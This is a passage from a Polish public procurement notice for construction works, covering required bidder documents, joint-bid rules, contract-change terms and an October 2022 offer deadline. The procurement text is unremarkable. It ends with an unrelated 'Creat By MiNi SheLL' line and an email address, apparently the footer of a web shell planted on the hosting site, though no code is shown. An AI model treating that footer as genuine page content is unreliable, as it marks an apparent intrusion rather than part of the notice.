SWZ.<br/>2. Oświadczenie, o którym mowa w ust. 1, stanowi dowód, potwierdzający brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu na dzień składania ofert.<br/>3. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni<br/>od dnia wezwania, terminie aktualnych na dzień złożenia następujących podmiotowych środków dowodowych: a) oświadczenia<br/>Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w ust. 1, w zakresie podstaw wykluczenia z postępowania (wzór oświadczenia stanowi Załącznik nr 4 do SWZ), b) wykazu robót budowlanych wykonanych nie wcześniej niż w<br/>okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości brutto, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane — w zakresie wskazanym w Rozdziale VII ust. 2 pkt 4) SWZ (wzór wykazu stanowi załącznik nr 5 do SWZ), c) dowodów<br/>określających, czy roboty budowlane zostały wykonane należycie, zgodnie z zakresem wskazanym w Rozdziale VII ust. 2 pkt 4)<br/>SWZ. Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli Wykonawca, z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów —<br/>inne odpowiednie dokumenty, d) polisy OC lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną<br/>wskazaną w Rozdział VII ust. 2 pkt. 3, wraz z dowodem opłacenia polisy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca<br/>zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu z postępowania oraz<br/>spełnianiu warunków udziału w postępowaniu — zgodnie z Załącznikiem nr 2 oraz Załącznikiem nr 9 do SWZ.<br/>2. Oświadczenie, o którym mowa w ust. 1, stanowi dowód, potwierdzający brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu na dzień składania ofert.<br/>3. Na podstawie art. 128 ust. 1 ustawy PZP, jeżeli Wykonawca nie złoży oświadczenia, o którym mowa w art. 125 ust. 1 ustawy PZP,<br/>podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu lub będą one niekompletne<br/>lub będą zawierać błędy, Zamawiający wezwie Wykonawcę odpowiednio do ich złożenia,<br/>poprawienia lub uzupełnienia w wyznaczonym terminie, z zastrzeżeniem art. 128 ust. 1 pkt 1) i 2) ustawy PZP.<br/>4 . W zakresie nieuregulowanym ustawą PZP lub niniejszą SWZ do podmiotowych środków dowodowych składanych przez<br/>Wykonawcę w postępowaniu, zastosowanie ma rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od<br/>Wykonawcy (Dz. U. poz. 2415), zwane dalej „rozporządzeniem w sprawie podmiotowych środków dowodowych&#34;.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty w formie wskazanej w Rozdziale XIII ust. 13 pkt 2) oraz ust. 14 SWZ.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa w Rozdziale IX ust. 1 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Przed zawarciem umowy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą mieli obowiązek przedstawić Zamawiającemu kopię umowy regulującej współpracę tych Wykonawców, zawierającą, co najmniej:<br/>1) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia,<br/>2) określenie zakresu działania poszczególnych stron umowy,<br/>3) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany treści niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2. Zamawiający na podstawie art. 455 §1 pkt 1 ustawy Pzp przewiduje możliwość wprowadzenia zmian istotnych do niniejszej Umowy polegających na:<br/>1) zmianie osób przeznaczonych do realizacji Umowy wskazanych w ofercie Wykonawcy;<br/>3. Zmiany wymienione w ust. 2 niniejszego paragrafu zostaną wprowadzone aneksem do niniejszej Umowy i będą skuteczne od daty zawarcia tego aneksu.<br/>4. Zmiana osób przewidzianych do realizacji umowy dopuszczalna będzie w przypadku zapewnienia osób o kwalifikacjach nie niższych niż wskazane w ofercie.<br/>5. Zmiana zostanie wprowadzona na uzasadniony wniosek Wykonawcy lub Zamawiającego, aneksem do Umowy.<br/>6. Zmiany do Umowy może inicjować zarówno Zamawiający jak i Wykonawca. Wykonawca wystąpi do Zamawiającego, składając pisemny wniosek, zawierający w szczególności:<br/>1) opis propozycji zmiany,<br/>2) uzasadnienie zmiany wraz z dokumentarni ją uzasadniającymi i dowodami, o których mowa powyżej.<br/>7. Wszystkie okoliczności wymienione w niniejszym paragrafie stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej<br/>zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-27 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com